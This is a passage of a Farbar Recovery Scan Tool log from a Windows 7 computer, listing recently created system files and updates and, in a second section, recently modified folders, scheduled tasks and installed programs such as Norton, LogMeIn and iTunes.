2016-11-12 07:30 - 2016-10-07 09:32 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
2016-11-12 07:30 - 2016-10-07 09:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2016-11-12 07:30 - 2016-10-07 09:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2016-11-12 07:30 - 2016-10-07 09:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2016-11-12 07:30 - 2016-10-07 09:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2016-11-12 07:30 - 2016-10-07 09:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
2016-11-12 07:30 - 2016-10-07 09:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2016-11-12 07:30 - 2016-10-07 09:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2016-11-12 07:30 - 2016-10-07 09:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2016-11-12 07:30 - 2016-10-07 09:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2016-11-12 07:30 - 2016-10-07 09:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2016-11-12 07:30 - 2016-10-07 09:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2016-11-12 07:30 - 2016-10-07 09:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
2016-11-12 07:30 - 2016-10-07 09:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2016-11-12 07:30 - 2016-10-07 09:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
2016-11-12 07:30 - 2016-10-07 09:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2016-11-12 07:30 - 2016-10-07 09:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2016-11-12 07:30 - 2016-10-07 09:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2016-11-12 07:30 - 2016-10-07 09:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2016-11-12 07:30 - 2016-10-07 09:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2016-11-12 07:30 - 2016-10-07 09:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2016-11-12 07:30 - 2016-10-07 09:12 - 01114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2016-11-12 07:30 - 2016-10-07 09:12 - 00644096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2016-11-12 07:30 - 2016-10-07 09:12 - 00581632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleaut32.dll
2016-11-12 07:30 - 2016-10-07 09:12 - 00275456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2016-11-12 07:30 - 2016-10-07 09:12 - 00067584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\asycfilt.dll
2016-11-12 07:30 - 2016-10-07 09:12 - 00050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2016-11-12 07:30 - 2016-10-07 09:12 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2016-11-12 07:30 - 2016-10-07 09:12 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2016-11-12 07:30 - 2016-10-07 09:12 - 00005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll
2016-11-12 07:30 - 2016-10-07 09:12 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2016-11-12 07:30 - 2016-10-07 09:12 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
2016-11-12 07:30 - 2016-10-07 09:12 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
2016-11-12 07:30 - 2016-10-07 09:12 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
2016-11-12 07:30 - 2016-10-07 09:12 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
2016-11-12 07:30 - 2016-10-07 09:12 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
2016-11-12 07:30 - 2016-10-07 09:12 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
2016-11-12 07:30 - 2016-10-07 09:12 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2016-11-12 07:30 - 2016-10-07 09:12 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2016-11-12 07:30 - 2016-10-07 09:12 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
2016-11-12 07:30 - 2016-10-07 09:12 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2016-11-12 07:30 - 2016-10-07 09:12 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2016-11-12 07:30 - 2016-10-07 09:12 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
2016-11-12 07:30 - 2016-10-07 09:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll
2016-11-12 07:30 - 2016-10-07 09:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2016-11-12 07:30 - 2016-10-07 09:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
2016-11-12 07:30 - 2016-10-07 09:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll
2016-11-12 07:30 - 2016-10-07 09:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
2016-11-12 07:30 - 2016-10-07 09:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
2016-11-12 07:30 - 2016-10-07 09:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
2016-11-12 07:30 - 2016-10-07 09:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
2016-11-12 07:30 - 2016-10-07 09:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
2016-11-12 07:30 - 2016-10-07 09:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
2016-11-12 07:30 - 2016-10-07 09:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll
2016-11-12 07:30 - 2016-10-07 09:04 - 00148480 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2016-11-12 07:30 - 2016-10-07 09:04 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2016-11-12 07:30 - 2016-10-07 09:04 - 00017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2016-11-12 07:30 - 2016-10-07 09:01 - 00338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2016-11-12 07:30 - 2016-10-07 09:00 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2016-11-12 07:30 - 2016-10-07 08:56 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2016-11-12 07:30 - 2016-10-07 08:50 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2016-11-12 07:30 - 2016-10-07 08:50 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2016-11-12 07:30 - 2016-10-07 08:50 - 00007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2016-11-12 07:30 - 2016-10-07 08:50 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2016-11-12 07:30 - 2016-10-07 08:49 - 00006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2016-11-12 07:30 - 2016-10-07 08:49 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2016-11-12 07:30 - 2016-10-07 08:49 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2016-11-12 07:30 - 2016-10-07 08:49 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2016-11-12 07:30 - 2016-10-05 08:54 - 00090112 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\bowser.sys
2016-11-12 07:30 - 2016-09-13 09:37 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2016-11-12 07:30 - 2016-09-13 09:11 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll
2016-11-12 07:30 - 2016-09-12 15:08 - 00107520 _____ (Microsoft Corporation) C:\Windows\system32\adsmsext.dll
2016-11-12 07:30 - 2016-09-12 14:49 - 00076800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adsmsext.dll
2016-11-12 07:30 - 2016-09-09 12:00 - 00497152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\win32spl.dll
2016-11-12 07:30 - 2016-09-08 08:55 - 00106496 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dfsc.sys
2016-11-12 07:30 - 2016-08-12 11:02 - 12574720 _____ (Microsoft Corporation) C:\Windows\system32\wmploc.DLL
2016-11-12 07:30 - 2016-08-12 11:02 - 00009728 _____ (Microsoft Corporation) C:\Windows\system32\spwmp.dll
2016-11-12 07:30 - 2016-08-12 11:02 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\msdxm.ocx
2016-11-12 07:30 - 2016-08-12 11:02 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\dxmasf.dll
2016-11-12 07:30 - 2016-08-12 10:47 - 12574208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmploc.DLL
2016-11-12 07:30 - 2016-08-12 10:31 - 00008192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\spwmp.dll
2016-11-12 07:30 - 2016-08-12 10:31 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msdxm.ocx
2016-11-12 07:30 - 2016-08-12 10:31 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxmasf.dll
2016-11-12 07:30 - 2016-08-06 09:31 - 00054272 _____ (Microsoft Corporation) C:\Windows\system32\WsmRes.dll
2016-11-12 07:30 - 2016-08-06 09:31 - 00012800 _____ (Microsoft Corporation) C:\Windows\system32\wsmplpxy.dll
2016-11-12 07:30 - 2016-08-06 09:15 - 00146944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmAuto.dll
2016-11-12 07:30 - 2016-08-06 09:15 - 00054272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmRes.dll
2016-11-12 07:30 - 2016-08-06 09:01 - 00013824 _____ (Microsoft Corporation) C:\Windows\system32\wsmprovhost.exe
2016-11-12 07:30 - 2016-08-06 08:53 - 00012288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wsmprovhost.exe
2016-11-12 07:30 - 2016-08-06 08:53 - 00010240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wsmplpxy.dll
2016-11-12 07:30 - 2016-06-14 11:21 - 00094440 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mountmgr.sys
2016-11-12 07:30 - 2016-06-14 11:16 - 00641024 _____ (Microsoft Corporation) C:\Windows\system32\msscp.dll
2016-11-12 07:30 - 2016-06-14 11:16 - 00325632 _____ (Microsoft Corporation) C:\Windows\system32\msnetobj.dll
2016-11-12 07:30 - 2016-06-14 11:16 - 00284672 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll
2016-11-12 07:30 - 2016-06-14 11:16 - 00206848 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2016-11-12 07:30 - 2016-06-14 11:16 - 00081920 _____ (Microsoft Corporation) C:\Windows\system32\cryptsp.dll
2016-11-12 07:30 - 2016-06-14 11:16 - 00037376 _____ (Microsoft Corporation) C:\Windows\system32\pcadm.dll
2016-11-12 07:30 - 2016-06-14 11:16 - 00011264 _____ (Microsoft Corporation) C:\Windows\system32\msmmsp.dll
2016-11-12 07:30 - 2016-06-14 11:16 - 00008704 _____ (Microsoft Corporation) C:\Windows\system32\pcaevts.dll
2016-11-12 07:30 - 2016-06-14 11:16 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll
2016-11-12 07:30 - 2016-06-14 09:21 - 00504320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msscp.dll
2016-11-12 07:30 - 2016-06-14 09:21 - 00265216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msnetobj.dll
2016-11-12 07:30 - 2016-06-14 09:21 - 00195072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioSes.dll
2016-11-12 07:30 - 2016-06-14 09:21 - 00106496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptnet.dll
2016-11-12 07:30 - 2016-06-14 09:21 - 00103424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfps.dll
2016-11-12 07:30 - 2016-06-14 09:21 - 00080896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsp.dll
2016-11-12 07:30 - 2016-06-14 09:21 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mferror.dll
2016-11-12 07:30 - 2016-06-14 09:15 - 00125952 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe
2016-11-12 07:30 - 2016-06-14 09:15 - 00055808 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe
2016-11-12 07:30 - 2016-06-14 09:15 - 00024576 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe
2016-11-12 07:30 - 2016-06-14 09:05 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rrinstaller.exe
2016-11-12 07:30 - 2016-06-14 09:05 - 00023040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfpmp.exe
2016-11-12 07:30 - 2016-06-14 09:00 - 00011264 _____ (Microsoft Corporation) C:\Windows\system32\pcawrk.exe
2016-11-12 07:30 - 2016-06-14 09:00 - 00009728 _____ (Microsoft Corporation) C:\Windows\system32\pcalua.exe
2016-11-12 07:27 - 2016-09-12 15:17 - 00077032 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe
2016-11-12 07:27 - 2016-09-12 15:08 - 01226752 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2016-11-12 07:27 - 2016-09-09 09:54 - 01629184 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2016-11-12 07:27 - 2016-09-09 09:54 - 00586752 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2016-11-12 07:27 - 2016-09-09 09:54 - 00575488 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2016-11-12 07:27 - 2016-09-09 09:54 - 00314368 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2016-11-12 07:27 - 2016-09-09 09:54 - 00273408 _____ (Microsoft Corporation) C:\Windows\system32\centel.dll
2016-11-12 07:27 - 2016-09-09 09:54 - 00224256 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll
2016-11-12 07:27 - 2016-09-09 09:54 - 00129024 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2016-11-12 07:27 - 2016-08-16 14:40 - 00343552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbhub.sys
2016-11-12 07:27 - 2016-08-16 14:40 - 00327168 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbport.sys
2016-11-12 07:27 - 2016-08-16 14:40 - 00099840 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbccgp.sys
2016-11-12 07:27 - 2016-08-16 14:40 - 00056320 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbehci.sys
2016-11-12 07:27 - 2016-08-16 14:40 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbuhci.sys
2016-11-12 07:27 - 2016-08-16 14:40 - 00025600 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbohci.sys
2016-11-12 07:27 - 2016-08-16 14:40 - 00007808 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbd.sys
2016-11-12 07:17 - 2016-07-22 08:58 - 00142336 _____ (Microsoft Corporation) C:\Windows\system32\poqexec.exe
2016-11-12 07:17 - 2016-07-22 08:51 - 00123904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\poqexec.exe
2016-11-07 17:47 - 2016-08-16 11:36 - 01009152 _____ (Microsoft Corporation) C:\Windows\system32\user32.dll
2016-11-07 17:47 - 2016-08-15 20:48 - 00833024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user32.dll
2016-11-07 17:47 - 2016-08-12 10:26 - 00464896 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv.sys
2016-11-07 17:47 - 2016-08-12 10:26 - 00405504 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys
2016-11-07 17:47 - 2016-08-12 10:26 - 00168960 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srvnet.sys
2016-11-07 17:45 - 2016-07-07 09:36 - 01896168 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpip.sys
2016-11-07 17:45 - 2016-07-07 09:36 - 00377576 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\netio.sys
2016-11-07 17:45 - 2016-07-07 09:36 - 00287976 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\FWPKCLNT.SYS
2016-11-07 17:45 - 2016-07-07 09:08 - 00046080 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpipreg.sys
2016-11-07 17:45 - 2016-05-13 16:09 - 03156480 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll
2016-11-07 17:45 - 2016-05-13 16:09 - 00192512 _____ (Microsoft Corporation) C:\Windows\system32\wuwebv.dll
2016-11-07 17:45 - 2016-05-13 16:09 - 00098816 _____ (Microsoft Corporation) C:\Windows\system32\wudriver.dll
2016-11-07 17:45 - 2016-05-13 16:07 - 00091136 _____ (Microsoft Corporation) C:\Windows\system32\WinSetupUI.dll
2016-11-07 17:45 - 2016-05-13 15:55 - 02607104 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2016-11-07 17:45 - 2016-05-13 15:53 - 00709120 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
2016-11-07 17:45 - 2016-05-13 15:53 - 00037888 _____ (Microsoft Corporation) C:\Windows\system32\wuapp.exe
2016-11-07 17:45 - 2016-05-13 15:52 - 00140288 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2016-11-07 17:45 - 2016-05-13 15:52 - 00037888 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2016-11-07 17:45 - 2016-05-13 15:52 - 00036864 _____ (Microsoft Corporation) C:\Windows\system32\wups.dll
2016-11-07 17:45 - 2016-05-13 15:52 - 00012288 _____ (Microsoft Corporation) C:\Windows\system32\wu.upgrade.ps.dll
2016-11-07 17:45 - 2016-05-13 15:50 - 00174080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuwebv.dll
2016-11-07 17:45 - 2016-05-13 15:38 - 00573440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapi.dll
2016-11-07 17:45 - 2016-05-13 15:38 - 00093696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wudriver.dll
2016-11-07 17:45 - 2016-05-13 15:38 - 00035328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapp.exe
2016-11-07 17:45 - 2016-05-13 15:38 - 00030208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wups.dll
2016-11-07 17:45 - 2016-05-12 09:18 - 00090624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\olepro32.dll
2016-11-07 17:45 - 2016-05-04 11:21 - 00114408 _____ (Microsoft Corporation) C:\Windows\system32\consent.exe
2016-11-07 17:45 - 2016-05-04 11:17 - 03244032 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2016-11-07 17:45 - 2016-05-04 11:17 - 02365440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2016-11-07 17:45 - 2016-05-04 11:17 - 00504320 _____ (Microsoft Corporation) C:\Windows\system32\msihnd.dll
2016-11-07 17:45 - 2016-05-04 11:17 - 00337408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msihnd.dll
2016-11-07 17:45 - 2016-05-04 11:17 - 00025088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msimsg.dll
2016-11-07 17:45 - 2016-05-04 11:17 - 00025088 _____ (Microsoft Corporation) C:\Windows\system32\msimsg.dll
2016-11-07 17:45 - 2016-05-04 11:16 - 00070144 _____ (Microsoft Corporation) C:\Windows\system32\appinfo.dll
2016-11-07 17:45 - 2016-05-04 09:04 - 00128512 _____ (Microsoft Corporation) C:\Windows\system32\msiexec.exe
2016-11-07 17:45 - 2016-05-04 08:55 - 00073216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msiexec.exe
2016-11-01 14:55 - 2016-11-01 14:55 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2016-11-01 14:51 - 2016-11-01 14:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud
2016-11-01 14:43 - 2016-11-01 14:43 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee Security Scan Plus
2016-10-25 19:02 - 2016-11-01 14:55 - 00000000 ____D C:\Program Files\iTunes
2016-10-25 19:02 - 2016-10-25 19:02 - 00001755 _____ C:\Users\Public\Desktop\iTunes.lnk
2016-10-25 19:02 - 2016-10-25 19:02 - 00000000 ____D C:\Program Files\iPod
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-11-23 18:30 - 2015-02-08 21:27 - 00044976 _____ C:\Users\Kenneth\Downloads\FRST.txt
2016-11-23 18:30 - 2015-02-08 21:24 - 00000000 ____D C:\FRST
2016-11-23 18:26 - 2015-02-11 15:55 - 02412032 _____ (Farbar) C:\Users\Kenneth\Downloads\FRST64.exe
2016-11-23 18:15 - 2015-05-31 12:12 - 00000000 ____D C:\ProgramData\IDrive
2016-11-23 18:12 - 2011-08-11 13:09 - 00003942 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{455289D7-BB8D-46C4-A347-FA67D6BA3AED}
2016-11-23 18:11 - 2009-07-13 22:45 - 00024608 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2016-11-23 18:11 - 2009-07-13 22:45 - 00024608 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2016-11-23 18:05 - 2012-07-25 22:41 - 00000898 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-11-23 18:05 - 2011-04-11 18:49 - 00000000 ____D C:\ProgramData\PDFC
2016-11-23 18:04 - 2014-01-25 03:24 - 00000990 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LogMeIn Control Panel.lnk
2016-11-23 18:03 - 2013-03-27 13:26 - 00000000 ____D C:\Program Files (x86)\PRTG Network Monitor
2016-11-23 18:03 - 2011-04-11 18:37 - 00000000 ____D C:\ProgramData\Temp
2016-11-23 18:01 - 2012-07-25 22:41 - 00000894 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2016-11-23 18:00 - 2009-07-13 23:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-11-23 14:54 - 2013-03-08 08:33 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2016-11-23 13:37 - 2015-07-31 03:14 - 00000000 ____D C:\Windows\System32\Tasks\Remediation
2016-11-23 13:14 - 2012-04-13 18:04 - 00000936 _____ C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-1169555862-3845460206-1416485692-1000UA.job
2016-11-23 10:09 - 2011-09-06 02:17 - 03219272 _____ C:\Windows\ntbtlog.txt
2016-11-23 00:45 - 2012-04-25 02:25 - 00000000 ____D C:\ProgramData\LogMeIn
2016-11-23 00:28 - 2011-08-11 13:12 - 00000000 ____D C:\Users\Kenneth\AppData\Local\CrashDumps
2016-11-22 16:14 - 2012-04-13 18:04 - 00000914 _____ C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-1169555862-3845460206-1416485692-1000Core.job
2016-11-22 13:24 - 2016-04-29 12:38 - 00003198 _____ C:\Windows\System32\Tasks\HPCeeScheduleForKenneth
2016-11-22 13:24 - 2016-04-29 12:38 - 00000340 _____ C:\Windows\Tasks\HPCeeScheduleForKenneth.job
2016-11-22 00:45 - 2011-04-11 18:55 - 00000000 ____D C:\Windows\system32\Drivers\NISx64
2016-11-22 00:43 - 2015-07-31 15:06 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Norton Internet Security
2016-11-22 00:43 - 2011-08-11 12:14 - 00002409 _____ C:\Users\Public\Desktop\Norton Internet Security.lnk
2016-11-21 01:55 - 2012-12-02 07:56 - 00003222 _____ C:\Windows\System32\Tasks\HPCeeScheduleForKENNETH-HP$
2016-11-21 01:55 - 2012-12-02 07:56 - 00000346 _____ C:\Windows\Tasks\HPCeeScheduleForKENNETH-HP$.job
2016-11-19 12:09 - 2011-11-08 13:55 - 00000000 ____D C:\Users\Kenneth\AppData\Local\Citrix
2016-11-19 11:53 - 2012-07-27 00:30 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-11-18 18:12 - 2009-07-13 21:20 - 00000000 ____D C:\Windows\system32\NDF
2016-11-14 16:06 - 2012-12-13 08:30 - 00002257 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-11-13 19:09 - 2009-07-13 21:20 - 00000000 ____D C:\Windows\rescache
2016-11-13 15:09 - 2009-07-13 23:13 - 00786622 _____ C:\Windows\system32\PerfStringBackup.INI
2016-11-13 15:09 - 2009-07-13 21:20 - 00000000 ____D C:\Windows\inf
2016-11-13 14:47 - 2009-07-13 22:45 - 00410648 _____ C:\Windows\system32\FNTCACHE.DAT
2016-11-13 14:46 - 2013-03-14 02:02 - 00000000 ____D C:\Program Files\Microsoft Silverlight
2016-11-13 14:46 - 2013-03-14 02:02 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight
2016-11-13 14:43 - 2014-12-10 03:38 - 00000000 ____D C:\Windows\system32\appraiser
2016-11-13 14:43 - 2014-06-05 02:19 - 00000000 ___SD C:\Windows\system32\CompatTel
2016-11-13 14:43 - 2009-07-13 21:20 - 00000000 ____D C:\Windows\SysWOW64\Dism
2016-11-13 14:42 - 2009-07-13 21:20 - 00000000 ____D C:\Windows\system32\Dism
2016-11-13 14:25 - 2013-08-14 02:01 - 00000000 ____D C:\Windows\system32\MRT
2016-11-13 14:19 - 2011-08-28 19:06 - 141011376 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2016-11-13 14:17 - 2013-03-14 02:03 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2016-11-09 19:21 - 2014-12-25 00:31 - 00004476 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2016-11-08 19:54 - 2013-03-08 08:33 - 00003768 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2016-11-08 19:54 - 2012-03-29 01:20 - 00796352 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2016-11-08 19:54 - 2012-02-23 00:18 - 00000000 ____D C:\Windows\system32\Macromed
2016-11-08 19:54 - 2011-08-11 15:23 - 00142528 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
